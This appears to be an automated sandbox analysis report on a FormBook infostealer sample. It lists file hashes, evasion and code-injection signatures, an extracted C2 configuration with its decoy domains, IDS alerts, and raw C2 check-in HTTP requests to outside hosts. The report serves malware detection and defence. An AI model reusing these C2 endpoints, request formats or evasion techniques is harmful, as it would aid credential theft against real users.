Windows Analysis Report ejecutable2.exe

Overview

General Information

Sample Name: ejecutable2.exe
Analysis ID: 491547
MD5: 2d359d2c999ccb15bc71229bb0275bb6
SHA1: 5b5a384e8147fd996ca7c1c08f041f7b1fe7927a
SHA256: 5345f3e44aadb2d07feb0520bce71dd59be35a53410fcfda5c5c1bec06b176bf
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.wwiilive.com/u4an/"], "decoy": ["charlottesbestroofcompany.com", "gxzcgl.com", "easyprints.xyz", "hitmanautomation.com", "play-to-escape.com", "beansmagic.com", "lianxiwan.xyz", "nuhive.net", "whystake.com", "n6h65.online", "emergencyprep4cast.com", "peolinks.com", "8ls-world.com", "tezportal.net", "trych.net", "bathrobeconnection.com", "quinnwebster.top", "sagarmakhija.online", "ladiesgossiping.com", "400doultonct.com", "anitaeichler.net", "zaibuxi.info", "cateringfrenchcroissant.com", "iblispk.art", "area-arquitectos.com", "iptechcm.com", "earthnodeone.com", "yhomggsmtdynchb.store", "movingcompanybaltimoremd.com", "na6jzt.com", "solarpanelsforhome.net", "krnlfree.com", "institutosamar.com", "only-dieta.store", "shieldhero.online", "booklibrarypdfapp.icu", "solidhelp.net", "bearmarket.party", "billysboots.com", "pyuaetr.com", "pizza-mio.com", "merchantcentergroup.com", "branchwallet.com", "multicoininvestment.com", "gzruohong.com", "doomfishingtackle.com", "eryamanescortbayan.xyz", "tunetel.com", "rhccateringevents.com", "monamodda.com", "horsmon-merchandising.com", "sharkhostlive.com", "petersonmovingco.com", "forinfodunia.com", "theseattlenotary.com", "nyc-lavage.com", "tes5ci.com", "dunedinhyperlocal.com", "myntlaccount.online", "vehiclegraphicstoronto.com", "alexarts-tortenmanufaktur.info", "empresaimperfeitors.com", "oinfoproduto.com", "mdjrhyp.com"]}
Multi AV Scanner detection for submitted file
Source: ejecutable2.exe Virustotal: Detection: 27% Perma Link
Yara detected FormBook
Source: Yara match File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.ejecutable2.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: ejecutable2.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: ejecutable2.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb source: ejecutable2.exe, 00000004.00000002.487685735.00000000009D0000.00000040.00000001.sdmp, wscript.exe
Source: Binary string: wscript.pdb source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp
Source: Binary string: wscript.pdbN source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.branchwallet.com
Source: C:\Windows\explorer.exe Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe Network Connect: 5.101.152.161 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.168.81.157 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tunetel.com
Source: C:\Windows\explorer.exe Domain query: www.play-to-escape.com
Source: C:\Windows\explorer.exe Domain query: www.yhomggsmtdynchb.store
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.iptechcm.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.pizza-mio.com
Source: C:\Windows\explorer.exe Network Connect: 195.77.116.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.77 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.wwiilive.com/u4an/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: BEGET-ASRU BEGET-ASRU
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.tunetel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.branchwallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.iptechcm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.pizza-mio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.play-to-escape.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.yhomggsmtdynchb.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 3.223.115.185 3.223.115.185
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 Sep 2021 15:39:12 GMTContent-Type: text/htmlContent-Length: 808Connection: closeVary: Accept-EncodingLast-Modified: Fri, 09 Oct 2020 08:38:37 GMTETag: "328-5b138dffc24c6"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.cs
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.472044018.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000005.00000000.473039091.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000005.00000000.439477133.00000000044E7000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerT
Source: explorer.exe, 00000005.00000000.472858003.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: ejecutable2.exe, ejecutable2.exe, 00000004.00000000.422605822.0000000001122000.00000020.00020000.sdmp String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknown DNS traffic detected: queries for: www.tunetel.com
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.tunetel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.branchwallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.iptechcm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.pizza-mio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.play-to-escape.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.yhomggsmtdynchb.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: ejecutable2.exe, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: CmsVPZkxbOtm.exe.0.dr, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 0.0.ejecutable2.exe.1120000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 0.2.ejecutable2.exe.1120000.2.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 4.2.ejecutable2.exe.1120000.5.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Uses 32bit PE files
Source: ejecutable2.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
